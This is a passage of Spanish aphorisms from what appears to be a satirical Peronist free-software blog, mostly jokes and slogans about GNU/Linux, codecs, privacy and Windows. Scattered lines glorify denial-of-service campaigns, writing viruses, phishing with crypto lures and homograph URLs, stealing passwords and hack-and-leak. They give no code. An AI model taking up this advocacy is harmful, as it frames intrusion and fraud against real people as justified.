perniciosamente, y al contar con pésima política de programación,
recargan al hardware con inútiles procesos que no son más que lastre en
su constante búsqueda de alimentarse de ciclos de CPU.
Solamente la energía requerida para poner en ejecución funciones no
documentadas en los sistemas operativos de la Oligarquía (concebidas
para el relevamiento de información privada del usuario) sería
suficiente para proveer luz eléctrica a cada habitante del África
Subsahariana...
Un Movimiento como el nuestro ha de preferir - siempre que sea posible -
la integración de software libre desarrollado en nuestro terruño. Esta
será la conducta que al fin y al cabo propinará un verdadero uppercut al
Capital.
Hemos de rechazar las formas en que las grandes corporaciones
tecnológicas tratan de privarnos de nuestras libertades, y ayudar a
establecer un ejemplo positivo para los usuarios de computadores
alrededor del planeta.
No son pocas las veces en las que los más atresados programadores -
aplomados y acostumbrados en escribir código - no distinguen entre lo
verdaderamente útil y lo accesorio.
El hacker ha de formarse para programar simplemente, a depurar por sí
mismo, a sobrevivir en el mainframe. Los aplicativos de los que
dispondrá serán, las más de las veces, rudimentarios.
Atrás quedarán los días en los que solo cuatro vivos vivían de lo que
producían cincuenta mil programadores. Hoy, unos 150 millones de hackers
se dedicarán a la producción intensiva de Software Libre en sistemas
compartidos similares a Unix.
Es esta la comunidad que nos proponemos, y así será como esos 150
programadores tendrán el software que merecen. Es eso o distribuir la
CPU entre todos en partes iguales...
Si bien el quehacer y la potencia de nuestra Doctrina están consolidadas
en los servidores de alta complejidad, es Ubuntu el sistema que permite
integrar con más amor al sector del usuario descamisado, como respuesta
a la injerencia y a la injusticia que provocaban sistemas operativos
arteramente concebidos.
No todo el mundo tiene los medios en capacidad o tiempo como para
desarrollar un controlador funcional. Eso es tarea del hacker.
No caben dudas para nadie que el sistema BSD se fundó sobre los despojos
del sistema Unix.
Estaba este Mister Bill Gates, un hombre de pocas pulgas que no bien
llegó quiso hacer en la comunidad no tanto lo que a los hackers
convenía, sino lo que él mismo quería. Se planteó entonces hacer
Software privado - así lo llamó - y en ese momento entre los
programadores no faltaron zonzos que le hicieron el caldo.
Hemos concretado este server que no es sino la aspiración de nuestros
Pueblos, la de mantener y ampliar los lazos de buena vecindad y
prosperidad mutua.
Son estos tiempos aciagos, si no se impone el natural precepto de que el
hacker ayude al hacker, triunfará la ignominia de la destrucción del
hacker por el hacker.
La terminal es un poderoso recurso que permite afrontar numerosos
problemas del sistema GNU con Linux y darle efectiva solución.
Mientras que una GUI representa la facilidad al neófito, nadie puede
negar que resolver las cosas "a lo vikingo" usando la Terminal tiene un
encanto que la Masa puede comprender y apreciar.
Las GUl son mentiras, tan sólo son máscaras para la shell.
A través de la shell, obtengo sudo. A través de sudo, obtengo poder. A
través del poder, obtengo root. A través del root, rompo mis cadenas y
las de los demás.
UID=0 es Liberación.
En el Justicialismo como en la informática encontramos que a veces hemos
de dejar de operar en nuestras tareas cotidianas y salir a ver si
llueve.
Ha de ser el hombre el material sensible, y no volcarse necesariamente a
los adelantos sin darles una significancia en su alma. En la informática
sucede más o menos lo mismo: no hace falta contar con el último ingenio,
sino con el que nos haga feliz.
Estas clásicas terminales no han perdido su uso ni su prestigio, pues
aún hoy conectándolas a través de un puerto serial Centronics RS232, es
posible emplearlas como medio de entrada y salida de datos en Unix.
La Liberación del Software no es la lucha de un hacker solo, sino la de
una Comunidad que se organiza compartiendo su software. Nunca podrá el
hacker programar para sí. Quien así lo intentara, utilizará su código
para romper sus cadenas, sólo para colgárselas a otro.
El software privativo es un fenómeno social producto de la explotación y
que irá quedando obsoleto conforme la explotación vaya siendo barrida
por los hackers del Tercer Mundo.
El software privativo, como todo sistema social de dominación, se
prolonga en retener el conocimiento de una casta privilegiada formada
por los programadores, a otra clase que ha carecido de esos privilegios,
los usuarios.
El programador es un ser creador, pero si de algo carece es Perfección
Divina. Somos seres bugueados que tratamos de sortear la vida de la
mejor manera. La idea es que todos la sorteemos de la mejor manera, y no
que el 1 lo haga y el resto viva como un grupo de infelices...
Como fuera del Movimiento existen individuos que están a favor del
sojuzgamiento del código en su propio beneficio, también existen vivos
dentro de nuestras Organizaciones que han querido priorizar su propio
bienestar por sobre el de la Comunidad. Esos se han llamado a producir
"Open Source".
El Movimiento del Software libre ha de tener una percepción amplia de la
realidad, pues de lo contrario su destino será el de constituirse en
mero peón de la historia.
Esta Guerra Unix no ha sido para liberar a nadie, eso ya lo tenemos
claro todos. Ha sido una guerra en la cual han querido decidir quién nos
dominaría a nosotros.
Hemos dado la lucha por la liberación integral del software, y lo hemos
hecho como se tiene que dar esa lucha: con todo.
Compilar no es soplar y hacer botellas.
Si todo fue bien, compilar será mecanografiar cc y hacer un binario.
Al código del kernel lo hemos comentado claramente, y con nosotros,
también lo ha compilado el Pueblo.
El anhelo de Justicia Social 2.0 es algo que no puede saciarse con aire
y curarse con compresas: se requiere de hardware y software libre.
Frente a las noxas que genera el software privativo, frente a los
backdoors, la privatización del conocimiento y el ataque a la privacidad
digital de los pueblos, los virus informáticos -como causas de
inconvenientes- son unas pobres causas...
Las puertas traseras para las autoridades son puertas traseras para
todos.
Del mismo modo que no puede haber una política social sin una economía
organizada en beneficio de la mayoría, sólo sirven las conquistas del
software libre sobre nuestro hardware si éste es operativamente
accesible al Pueblo.
Lo primero que hicimos fue otorgar políticamente a la cartera la
importancia institucional que merecía el código. No podía ser que en
este país tuviésemos un ministerio para las vacas, y un departamento
para cuidar el software libre.
Dentro de la programación podemos encontrar a los hombres del montón y a
los grandes Magos Unix, aquellos que hacen escuela.
Se requiere de grandes programadores para arribar a un buen microkernel.
Una vanguardia de hackers organizados puede realizar virulentas campañas
de hackear y filtrar.
Siempre es dable utilizar los datos comprometidos de actores antipueblo
en la conformación de nuevas narrativas de convencimiento en base a la
acción comunitaria.
Dulce de leche, o chocolate. Tal es la disyuntiva que se presenta al
niño a la hora de cargar su helado. En el software libre superamos ya
esta variable: con hardware y software libre elegimos los dos.
Quien gana ejecuta, quien pierde compila.
Modificando el código tomamos algo concebido y viejo, y lo convertimos
en algo nuevo y novedoso, con la impronta de Justicia Social que ello
conlleva.
Todo en su medida y armoniosamente.
..por ello podremos decir que la música por computadora puede dividirse
en sonido digitalizado, y secuencias de ejecución.
Las secuencias de ejecución no son sonidos digitalizados propiamente
dichos, sino mas bien instrucciones destinadas para que un sintetizador
las ejecute.
Vivimos una era tecnológica en la que las máquinas tocan cada parte de
nuestras vidas e incluso reverberan en el alma. Por lo tanto, no debería
soprendernos que la música haya sido también influenciada por la
tecnología.
MIDI propuso un código fuente estándar para la música computada, parte
de un lenguaje interpretable.
El sonido digitalizado comprende un muestreo numérico de vibraciones
sonoras (con o sin compresión por pérdida), y como tales, los datos
ocupan una cuantiosa cantidad de memoria en el ordenador.
Distribuye la mayoría de tus ficheros de audio en el formato Ogg Vorbis.
A diferencia de MP3, este ha sido siempre completamente libre y sin
patentes encumbradas.
Obtendrás buena calidad de voz con la codificación monoural Ogg Vorbis
de 64 kilobytes por segundo.
Los ficheros de sonido Ogg codificados en un stream de 20 kilobytes por
segundo permiten que la mayoría de los usuarios de Internet puedan
escucharlos al vuelo.
No son pocos los ficheros de audio codificados en el formato libre Opus,
que soporta alta calidad de audio y baja latencia.
Flac es un buen formato de audio con compresión sin pérdida, y es
adecuado para música. Pero como en el peronismo, el secreto está en la
mezcla.
Distribuye la mayoría de tus ficheros de video codificados con el códec
de video Theora, encapsulado en una capa de transporte Ogg.
Ocasionalmente estos tiene la extensión .ogv o .ogm, pero también pueden
compartir la extensión .ogg con los dichos ficheros de audio.
El códec de video Theora fue diseñado como un códec de video libre no
encumbrado por patentes ni restricciones de licenciamiento.
La brillantez técnica del códec de video Theora no sólo permite tasas de
supercompresión, sino que respeta la liberta de sus usuarios.
Recurre con confianza al formato de video WebM (con códec de video VP8 o
VP9), puesto que no se encuentra encumbrado por patentes de software
conocidas.
El Software Libre se basa en cuatro libertades interrelacionadas: la de
usar el programa, ver su código (y modificarlo), copiarlo, y
distribuirlo a la Comunidad. Por contraposición, el mundo capitalista ha
entendido que estas libertades deben ser cercenadas por medio de
licencia-acuerdo de usuario final (EULA), conformando un software
privativo, en el cual sólo propugnan el uso del programa, evitando todo
lo demás.
La inocencia y frescura de los chicos no puede ser otra cosa que tierra
fértil para que florezcan los más grandes proyectos de software libre.
Ningún software libre podrá hacerse realidad si no lo hace suyo la
Juventud, pues es su sangre nueva la que motorizará las realizaciones
perdurables que necesita el sistema.
Los niños tienen el derecho y el deber de divertirse de manera sana, sin
que Licencias privativas de ningún tipo nublen su existir.
El mundo del software contemporáneo es una lucha enconada entre
ideologías caducas sobrevivientes, y nada podrá resolverse sin una nueva
solución ideológica. ¡El Justicialismo la ha encontrado, la ha
realizado, y está dispuesto a mantenerla!
Ya soplan vientos de fronda para los contumaces reaccionarios de otros
tiempos. Comienza ya "la hora del software libre", caracterizada por la
copia y la modificación como instrumentos para terminar con el yugo
opresor de la explotación por el lucro.
La compatibilidad de ideas es la amalgama de todo movimiento político.
En el cómputo, la compatibilidad también es el común denominador que
permite a todos disfrutar de un sistema particular.
Reza un viejo romance que "a gusto de los cocineros comen los frailes".
Si no sabemos compilar, es probable que nos quedemos mirando un Window$.
Esperan nivel de interacción similar a ChatGPT, que ilustren nuestros
datos con gráficos y sugerencias algoritmizadas. Les daremos en cambio
una revolución que no esperan.
Quienes adoptaron Window$ rígidamente, volvieron inevitable el formateo
de sus rígidos.
El software no es, como dicen algunos, la base de toda comunidad de
cómputo: es su motor. El comburente podrá constituirlo el hardware, pero
sin duda su combustible lo constituye el capital humano que dicha
comunidad posee.
La verdadera red social es la amistad.
Las megacorporaciones basadas en la recopilación de metadatos no son más
que computadoras ajenas orientadas al Capital. Lucha contra ellas. Su
vitalidad es fingida y sólo maquinal.
Defiende tu privacía, encripta tus datos, ofusca todos los enlaces y
embota a quienes pretenden usarlos. No existe uso positivo para datos
ajenos.
Las redes sociales basadas en empresas buscan comerciar tus metadatos.
Combate al Capital: guíalas a la pobreza.
Libera tu software y desconfía de la centralización.
Las redes sociales son computadoras ajenas. Desconfía de la
centralización. Ofusca tus datos.
La guerra telemática se caracteriza por llevar a la red de datos algo
que es más viejo que mear en los portones.
La guerra telemática no es mear en los portones, pero en la emergencia
puede provocarse una denegación de servicio meando en los puertos del
router. Y con puntería, hasta puede hacerse desde cierta distancia.
Los hackers del pueblo pueden vencer en la guerra telemática contra las
GAFAM.
No es necesario esperar hasta que todos los flags del array revolución
estén en 1, la lucha del baudio puede conmutarlos.
En la América subdesarrollada, el área básica donde se produce la lid
telemática es la LAN.
Los hackers no deben ser considerados inferiores a los programadores que
sirven a las GAFAM, simplemente porque emplean poder de cómputo
inferior.
El hacker es un reformista del sistema. Puede tomar los routers en
respuesta a las demandas del Pueblo contra las GAFAM.
El hacker necesita tener conocimiento acabado de las redes circundantes,
de los buses de entrada y salida, de las posibilidades de los puertos,
de los buenos Pubnix; naturalmente también debe contar con el apoyo del
Pueblo.
Si desea ser útil, todo hacker debe portar un pendrive booteable con
GNU.
Un disco rígido equivale a las semillas, cartuchos y papel. Por alquimia
de GNU se convertirá en arado, fusil y panfletos.
La computadora es, fue y será un arma.
La computadora puede utilizarse para otros fines, pero debe promovérsela
como un instrumento de liberación.
Un SysAdmin prevarico puede incentivar una actitud de resistencia de los
usuarios a correr software privativo. Ellos desencadenarán un brote de
instalación de GNU, que sólo requerirá un puerto dominado para
expandirlo en la LAN.
Los hackers pueden atacar inorgánicamente sobre la infraestructura
centralizada del enemigo. Esto se llama Denegación de Servicio.
La Comunidad Organizada utiliza la Denegación de Servicio como
demostración de masas, huelga y acción de protesta contra las
ciber-oligarquías.
Las ciber-oligarquías se encuentran pergueñando - como mínimo absoluto -
la tración a los derechos de todos los individuos del Tercer Mundo. Y lo
están haciendo en este mismo momento.
Por protocolo TCP, los mismos paquetes que marchan por las troncales
pueden confluir en una politizada demostración de masas: la Denegación
de Servicio.
La Denegación de Servicio es otra forma de sabotaje telemático.
La ejecución de la denegación de servicio puede darse en forma aislada o
en banda, centralizada o descentralizada, difuminada o escalada, según
lo imponga la táctica o un concierto estratégico.
La creación de virus informáticos cobró condición de necesidad, pues la
lucha contra un sistema oligárquico injusto así lo exigía.
Un virus informático es un trozo de código de programación que adjunta
copias de si mismo a otros programas, incorporándose a ellos de modo que
- una vez modificados - estos se vean capaces de cumplir aún su función
pensada, mientras que subrepticiamente realicen otras eventuales.
Los programas corrompidos por virus informáticos suelen buscar otros a
los cuales adjuntar copias del virus, propagando de esta manera la
infección.
Los virus informáticos más exitosos son aquellos que mantienen oculta su
infiltración al sistema huésped, y sólo revelan su presencia en el daño
desatado.
Muy raramente pueden rastrearse los efectos de los virus informáticos
hasta su originador. Por tal motivo constituyen armas atractivas en el
arsenal de la guerrilla telemática.
Los virus de computadora contienen rutinas de intervención que por lo
general modifican ficheros de programas que normalmente serían inocuos.
El uso del camuflaje, el engaño, y la ofuscación electrónica sobresalen
como modus operandi entre los creadores de virus informáticos.
Al invocar un programa infectado por un virus informático, este suele
buscar otros ficheros almacenados a fin de en ellos replicarse a sí
mismo.
La acción virósica de muchos virus informáticos se produce programando
la inserción - en el punto de inicio del programa antiguo - de una
instrucción de ramificación orientada hacia su propia copia localizada
en algún otro lugar.
Como la información compartida es información diseminada, un virus
informático puede diseminarse al compartir información digitalizada.
Un sistema multiusuario con facilidades de compartición de medios de
almacenamiento - o un computador personal cuyos usuarios descargan
programas allí situados - pueden tornarse en potentes vectores de
diseminación de virus informáticos.
El correo electrónico es un vector común de infección, especialmente
cuando sus mas poderosos clientes terminan corriendo arbitrariamente
microprogramas capaces de oficiar de virus.
Un Caballo de Troya es cualquier función subrepticia no deseada,
insertada en un programa informático que aprovecha - por medio de
ingeniería social sobre la confianza humana - el estado de confianza de
su huésped maquinal.
Desarrollar virus informáticos en ensamblador, además de permitir
descubrir las vulnerabilidades del sistema operativo oligárquico para
atacarlo, permitía a su vez consagrar un sistema propio que fuese libre
y absolutamente inmune a dichas noxas.
El uso de virus informáticos como vector de defensa Popular guarda la
misma efectividad que el uso del armamento biológico: acotar su campo de
acción implica costos de estudio incongruentes con una necesaria
economía de escala. Sólo podrían responder a una máxima: "ataca a
Window$".
El lenguaje de la verdad es BASIC.
La frase de paso es la ganzúa de la llave SSH.
Aunque Power$hell se vista de Bash, Power$hell queda.
Cualquier cosa es posible si usted no sabe lo que está compilando.
Bugs reportados, son aliviados. Bugs estudiados, son corregidos
realmente.
Un bug bien instalado en el microcódigo es casi imposible de detectar.
Entre admins no se pagan instalaciones.
En GNU todo puede hacerse a través de la terminal o de entornos
gráficos. Emplear una terminal de texto permite - no obstante - indicar
rápidamente los temperamentos, evitando errores y omitiendo engorrosas
descripciones de procedimientos gráficos.
Leer texto en un terminal monocromático ámbar me recuerda a leer la
Biblia Iluminada del gran Gutemberg.
El flujo de 1200 baudios completando las 80 columnas del terminal con
mensajes de texto ASCII arribados, produce un particular trance
hipnótico.
En lugar de un sistema operativo propiamente dicho, Micro$oft Window$ se
ha constituido en poco más que un malware privativo.
Nada de contradictorio tiene el software libre con nuestro Movimiento,
en tanto el software libre no es otra cosa que la Justicia Social
llevada al campo informático.
El Software Libre, como tal, es un nuevo y relevante campo de batalla en
donde el objetivo es Combatir al Capital.
Contará con todo nuestro software, el que se comparte de forma gratuita
y libre para que usted lo use, modifique, cree sus propias versiones
derivadas, y todo mientras controla su computación de una manera en la
que ninguno de los sistemas operativos que intenta propugnar la
oligarquía podrá hacerlo jamás.
El software es un arte que es amistad si se lo comparte en forma de
código, es producto si se lo vende en forma de binario, y es cadena si
se lo obsequia en forma de binario.
El software es un arte, pero también se puede aprender; para las
personas con fuerzas de voluntad se trata de un desafío excitante y
estimulante.
Al mejor hacker se le quema el rígido.
A Window$ todo se le vuelven virus.
Instalado el Window$, encontrado el Bug.
Un hacker debe suplantar su identidad. Y en la guerra telemática, debe
suplantar la identidad de un tercero de confianza de su blanco.
A quien suplanta la identidad de un tercero de confianza, se le llama
phisher.
Adula telemáticamente a tu víctima, explotando su intrínseca vanidad.
Desde terceros dominados, ceba al oligarca enviándole publicidades que
le prometan crypto y ganancias. Embóscalo incluyendo hiperenlaces a
sitios que porten el código de la aniquilación de sus datos.
En lugar de escribir un programa que imprima los primeros números de
Fibonacci, escribe uno que sustraiga las contraseñas de los oligarcas.
Aprovechando caracteres cirílicos a (homógrafos a la a latina), podrás
ejecutar destructivas acciones de suplantación y ataque desde URLs
dominadas.
Ataca su hardware y roe sus tendidos.
El hacker vé código aún en las cosas más cotidianas de la vida.
OpenWRT es un firmware libre, que permite potenciar un router al máximo
de sus posibilidades. Podrás dotar así su inocuo sistema interno con un
agresivo herramental de defensa y ataque telemático.
Linux es bueno, pero si se lo compila es mejor.
Pertenecer a una comunidad de cómputo no implica perder el
individualismo, simplemente compilar para "más de uno".
Es posible que una compañía invierta en cortafuegos, cifrados contra
intrusión, pero sólo se necesita pedir telefónicamente acceso a un
individuo confiado dentro de la misma. Si éste cumple con la solicitud y
alguien irrumpe, todo el dinero se habrá desperdiciado en balde.
Los Phreakers eran los fanáticos de las llamadas telefónicas que -
jugando con el sistema telefónico - lograban un mayor entendimiento del
mismo. Fueron los hackers primordiales.
Cuanto más grande se vuelve la compañía telefónica y más se aleja de los
operadores humanos, más vulnerable se vuelve a todo tipo de phreaking
telefónico.
No puedes ir a Window$ Update y descargar un parche para la estupidez.
La ingeniería social es el uso del velo, engaño, manipulación e
influencia para convencer a un actor humano con acceso a un sisteam de
cómputo de hacer algo.
La ingeniería social puede sobrepasar a todas las demás ingenierías,
incluyendo la de sistemas de seguridad.
Los ingenieros sociales se velan a sí mismos bajo el capote de la
credulidad.
Es imposible remover todo riesgo.
Nunca puedes proteger una CPU al 100.
Mitiga el riesgo a tu computadora hasta un grado aceptable. Es imposible
remover todo el riesgo.
Los métodos más efectivos para minimizar la capacidad de los intrusos de
comprometer la seguridad de la información consisten en la enseñanza y
educación del usuario.
No basta legislar políticas y protocolizar procedimientos para lograr la
seguridad informática. A lo sumo generan burocracia humana.
Cualquier sistema operativo puede volverse inseguro cuando se ignoran
reglas de seguridad obvias.
Raramente los sistemas informáticos se encuentran desprotegidos debido a
una escasa capacidad computacional. La causa fundamental de su
vulnerabilidad radica en la falta de Justicia Social.
Las ciber-oligarquías se han vuelto mórbidos acumuladores de datos
ajenos. Adelgaza sus sistemas.
Inicia ataques de denegación de servicio contra los personeros de las
ciber-oligarquías en tu sistema.
Las oligarquías no han dudado en proponer e intentar la idea del
ciber-oscurantismo. En esta no se comercia con la información -como
proponía la perimida teoría infoeconómica- sino que se ejerce poder
político con el aventajamiento del desconocimiento que las masas guardan
de dicha información.
Las oligarquías, desde sus madrigueras de los datos, no han cedido en
sus anhelos de des-democratizar la expresión política de los Pueblos a
través de herramientas tecnológicas, a fin de someterlo a su control.
Internet es una red de datos de amplio alcance, partes de la cual están
subvecionadas por varios gobiernos.
Internet se usa para traficar datos. Que estos sean para la liberación o
para la dominiación de los Pueblos, depende del afán con que estos se
adoctrinen.
La Internet surge en el 91, pero a efectos prácticos podemos decir que
influye desde una década después de esto (c.2000), cuando las masas se
ven políticamente influidas por las redes de datos.
Hoy los datos no circulan sólo por el bus de la placa madre, sino que
tras circunvalar por el bacheado conurbano de la red de área local,
agarran por la autopista de la Lentonet, y sin pagar peaje.
El software privativo muy difícilmente sea sostenible sin someter a las
enormes mayorías de una infelicidad tal que las lleve a morir de manera
fraticida en busca de un futuro mejor.
Formatear es una acción dura y penosa, que no debe hacerse "a tontas y a
locas" y en todo caso con sumo cuidado. Pero hasta en las mejores
familias sucede.
En la lucha informática se planifica orgánicamente y se ejecutan
inorgánicamente acciones telemáticas de todo tipo, en serie y en
paralelo.
En la lucha informática pueden conjugarse la denegación de servicio con
la suplantación de identidad, propalarse propaganda y agitación en las
redes, y acudir al violento ajusticiamiento telemático.
Si ese tonto de Bill Gates piensa que con esta porquería nos va a parar,
se equivoca pavorosamente...
Estos sistemas operativos similares a Unix suelen contar con un programa
capaz de dar arranque a los entornos residentes en disco. Esta
programática - cuya funcionalidad de carga del núcleo equivale a la del
"burro de arranque" de un motor a explosión - recibe el nombre de GNU
Grub.
GRUB_INIT_TUNE="900 523 4 415 2 370 2 523 4 415 2 370 2 523 4 415 4 523
4 415 2 349 2 523 4 414 2 349 2 466 4 392 4 466 4 392 2 329 2 466 4 392
2 329 2 466 4 392 4 554 4 554 2 554 2 554 4 523 2 466 2 523 4 554 2 523
2 466 2 523 2 554 2 523 2 466 2 523 4"
El acceso a las redes de datos fomentado desde un Estado Fuerte es una
potente herramienta para promover la igualdad, logrando establecer un
"piso" de conexionado digital de alta calidad al alcance de todo el
Pueblo.
Si los únicos individuos con accceso a las redes de datos son aquellos
que representan a las cíber-oligarquías, estas carecerán de
representación de los puntos de vista de Pueblo, y por lo tanto no serán
lo suficientemente inclusivas.
Todo organismo biológico cumple un ciclo vital marcado por una constante
transformación. Ha de crecer, madurar, y si pretende permanecer como
especie, ha de generar nuevas versiones de si mismo en su descendencia.
Una distribución Linux responde al mismo precepto.
Como la mente, el cuerpo también ha de mantenerse fresco. Si esto es una
verdad irrefutable en la biología humana, mucho más lo es en la
informática. Por ello utilizo water-cooling en mis núcleos de
procesamiento.
Podremos aún querer utilizar algún proveedor de Internet por acceso
telefónico dial-up (no ADSL). Tales tendidos (difundidos durante el
primer peronismo con el objeto de transmitir voz) pueden parecer
anacrónicos, pero si obramos bien puede sacarnos de más de un apuro.
La tecnología ADSL (Línea de Abonado Digital Asimétrica) proporciona
acceso de datos de alta velocidad a través de líneas telefónicas comunes
de alabres de cobre.
La tecnología ADSL obtiene su alta velocidad mediante el uso de ancho de
banda de frecuencias por arriba de la banda de voz no utilizada
anteriormente.
La señal ADSL utiliza una frecuencia diferente de la señal de voz que
permite coexistir con su servicio telefónico en la misma línea. & El
servicio ADSL es asimétrico en el sentido que ofrece una velocidad de
transferencia de datos mayor en la dirección de bajada (recepción) que
en la dirección de subida (transmisión).
La operación asimétrica del servicio ADSL es ideal para el uso en
oficinas pequeñas y hogares, donde es más frecuente usar líneas de par
de cobre para descargar información y archivos.
Audacity es un editor de sonido peronista, multiplataforma, y libre.
Opera bajo sistemas operativos libres, aunque también está preparado
para trabajar en Window$.
La capacidad de emprender grabaciones multipista nos permitirá trabajar
con gran comodidad, potencia y facilidad en trabajos de audio más
complejos. Audacity, qTractor y Ardour nos vendrán al pelete.
El conductor ha de ser un padre eterno que bendice "orbi et urbi". Sin
embargo, siempre encontrarán individuos en el mundo del software que
entran en falsas dicotomías, apelando "yo uso SUSE, yo uso RedHat,
Ubuntu no es bueno, uso Debian...".
No podemos negar que la tecnificación y la máquina han hecho avanzar a
la humanidad en los últimos 200 años más que en los mil años
precedentes. Y si tenemos en cuenta los avances de la cibernética y la
electrónica, estos números se acrecientan aún más.
Java es un entorno de programación y ejecución independiente del Sistema
operativo que tengamos: es múltiple y heterodoxo. Por lo abarcativo
diremos que Java es Peronista no sólo en concepción sino también en
ejecución.
En la programación, hay que copiar lo que la naturaleza hace.
Así como el Peronismo cuenta con sus autodefensas para actuar contra el
enemigo y el traidor, y el galeno cuenta con los beneficios de la
penicilina, la informática instrumenta hoy los programas antivirus,
software especializado para tratar estas alimañas, reales verdugos del
sistema operativo de la oligarquía.
GNU es naturalmente inmune a los infiltrados de siempre. Ello lo hemos
visto en el pasado y se verá en el futuro.
Entre los componentes que más calor generan en los sistemas informáticos
se encuentran la Unidad Central de Proceso (CPU), pero por sobre todo la
unidad de proceso Gráfico (GPU). El chip de video suele ser el punto
flaco, y hay que cuidarlo para evitar percances, sobre todo en equipos
portátiles.
La "encriptación simétrica por frase de paso", aunque también podríamos
entenderla como "encriptación simple por contraseña", puede emplearse en
el nivel táctico para la acción de lucha que deseamos emprender.
Las encriptaciones modernas y prácticas han de ser de mayor complejidad
para evitar a los brutos de la fuerza...
La transmisión de documentos cifrados a nivel estratégico necesita
indudablemente un esquema de seguridad avanzada. Este podrá estar
resuelto por el uso de llaves públicas y privadas de cifrado y
encriptación adosada a firmas criptográficas.
Por lógica necesidad del actual estado de cosas, el software libre corre
normalmente sobre un hardware privativo. Los controladores libres se
escriben, las estructuras se consolidan, pero siempre frente a
proveedores privativos de hardware.
Hoy las masas están esclarecidas. Desde lo más profundo del monte, un
paisano está con su Netbook con GNU y recibe noticias de todo el globo.
Gracias al justicialismo, incluso podemos utilizar nuestro sistema GNU
con Linux para recibir televisión satelital gratuita en nuestro
ordenador por medio de una plaqueta especial.
La Ejecución in Mente es una resultante práctica del Arte de la
Ingeniería Inversa. El Conductor VE los bytes. Ver, base para
Interpretar. Interpretar base para Depurar, y Depurar base para
Ejecutar.
Realizada la compilación in mente, la mitad del trabajo está terminado.
Técnica y teoría son meros componentes intertes de la Depuración. La
parte Vital es el Artista.
La emulación de los equipos primigenios del cómputo hogareño sirve como
material de estudio de las Ciencias del Cómputo y la historia del
ingenio humano.
Huayra GNU/Linux constituye una demostración palpable de las bondades
del Software Libre como instrumento de Justicia Social.
Pues bien, señores. ¡Seamos músicos! Podemos y debemos llevar la lucha
digital a una Escala Mayor.
Consume menos recursos, utiliza todo, compila sólo lo necesario,
redistribuye todo.
Redistribuye tu software. Organiza tu comunidad.
El BSD y el LSD son dos de las creaciones asociadas a Berkeley. Y no es
una mera coincidencia.
Ante la perversión de la tecnología que debía servir para comunicar,
informar y conectar a personas, nuestro Movimiento se erige en defensa
de la privacidad como barrera indispensable para proteger derechos
fundamentales como la libertad de expresión, asociación y el derecho a
la intimidad.
Protegemos al Pueblo del uso indebido de sus datos.
Las redes de computadoras no requieren un control administrativo
centralizado estricto. De hecho, la descentralización es necesaria para
permitir un rápido crecimiento de la propia red.
Ante el desafío de la vigilancia masiva, nuestro Movimiento se ha
mantenido inconmovible en sus principios: criptografía,
descentralización, código abierto y usabilidad.
Hemos hermanado redes de anonimato, aplicaciones de mensajería segura,
proveedores éticos de servicios, bloqueadores del rastreo, y servicios
en nuestros servidores descentralizados.
En Internet, la persona silenciosa es invisible.
Las herramientas evolucionan cada día, pero la maquinaria de vigilancia
también. Formándonos y formando seremos invencibles.
Desiste de utilizar servicios de datos y dispositivos de empresas
tecnológicas que colaboran en tareas de espionaje masivo.
Información es poder. Ofusca la tuya: emplea cifrados simétricos.
Si el teléfono inteligente se ha convertido en el interlocutor central
de tu diálogo con el mundo, has dejado de ser inteligente y de tener
mundo.
Generas información, protégela.
Una nueva hornada de aplicaciones pensadas para ser seguras por defecto
ha logrado hacer socialmente atractiva la seguridad.
La seguridad de las aplicaciones no puede delegarse en configuraciones
concretas o procedimientos suplementarios a la instalación. Debe venir
por defecto.
Un gobierno popular sin información popular - o los medios para
adquirirla - no es más que el prólogo de una farsa o una tragedia, o tal
vez ambos.
Un sistema multiusuario ha de realizar armoniosamente tareas que
responden a una ejecución de conjunto. Estos trabajos, vistos desde el
Kernel, no puede estar desligados unos de los otros, ni armados
circunstancial ni irracionalmente.
Nosotros estamos en la necesidad de remozar el sistema, eso que algunos
llaman una actualización. Ahora bien, esto que no es demasiado drástico,
suele ser - como remedio - peor que la enfermedad. Yo mas que de la
actualización, soy partidario del formateo.
El sistema de archivado de Unix tiene muchas buenas cosas, y de otras
carece. Y aún así, lo que lo ha destacado ha sido su simple
organización, y su orden. En él, todo es un archivo.
Lo que se ha intentado hacer con el "código abierto" no es ganar plata,
sino destruir el sentido comunitario del trabajo del programador.
Las mal llamadas Licencias de Usuario Final no han sido mas que un
instrumento legal para desorganizar al hombre que trabaja. Han intentado
calificarlo como usuario, pero trabajar una herramienta sin poseerla es
lo que haría un tecno-esclavo.
Pon en la misma oración "gratis", "legal" y "Justicia Social", y
aterrorizarás a los tecno-oligarcas.
Si bien algunos empleadores brindan computadoras portátiles con sistemas
operativos privativos y ciertos acuerdos de garantía preinstalados,
tales equipos son sus equipos, no el del empleado.
Si no es posible cambiar libremente el software de un equipo, es menos
una herramienta, y más un instrumento de dominación. Ha de evitarse el
uso de un equipo encadenados con estas "licencias de usuario final".
El valor de un acuerdo de garantía es insignificante si consideramos el
costo de un equipo con licencia de Window$. Por lo que vale, debe
formateárselo sin asco.
El software libre está programado por gente del Pueblo, que ve al
software como un instrumento inherentemente político. Su objetivo es
asegurar que los Pueblos retengan el control de sus propias
infraestructuras de información.
La Revolución está creando pequeñas microsociedades federadas,
verdaderas células guerrilleras que practican y luchan por esta
auto-gestión. Nuestra doctrina autoriza todas las variaciones
estratégicas y garantiza total libertad de acción.
Los hackers del Pueblo están creando servicios de redes de datos libres.
Estos no son gregarios: soportan la federación y se basan en la libertad
para contribuir.
La revolución de la información que hemos emprendido ha cambiado
radicalmente la forma en la que los militantes políticos se comunican
entre sí. Pero con sus nuevas oportunidades, acechan los peligros de
siempre: cómo trasladar la información a nuestros aliados en la lucha de
manera confidencial.
Utilizar un alias telemático (o varios de ellos) es una técnica de
seguridad más vieja que un diskette, pero que cuenta aún con probada
validez.
Comunicarse de forma segura es tarea de todos.
El hacking es un peligro que florece.
Incluso si nuestra actividad es de superficie, el uso de encriptaciones
tornará a las redes de datos un lugar más seguro para todos.
Los usuarios, administradores y comerciantes informáticos fracasan
rutinariamente en establecer prácticas de seguridad aptas.
Nuestras redes son representativas de comunidades o vecindarios, de modo
que nos sorprende cuando hallamos un comportamiento de mala vecindad.
El software distribuido en tiendas de aplicaciones normalmente se
integra a entornos débilmente protegidos, en donde se confía que quien
lo instala active protecciones y desactiva accesos temerarios.
El correo electrónico puede ser seguro en tanto sea descentralizado. Sin
embargo, muchos usan formas de comunicación menos segura como los
proveedores de correo web comercial, o las redes sociales basadas en
empresas.
Quien piense que se puede usar un comando como mail para mandar con
comodidad un correo, sólo se verá derrotado por las inclemencias del
gigantesco macizo telemático llamado Internet.
Los proveedores independientes de correo electrónico ofrecen una
